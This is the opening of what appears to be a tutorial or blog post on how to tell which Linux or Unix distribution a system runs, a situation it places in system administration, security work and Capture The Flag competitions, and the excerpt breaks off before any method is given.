What flavor of *nix is on Question: What kind of Linux am I on and how can I find out? Often you’ll find yourself logged into an unfamiliar flavor of Linux/Unix at work in a system administration or security capacity, and also very often in competitive hacking games called Capture The Flag (CTF) competitions. The [...]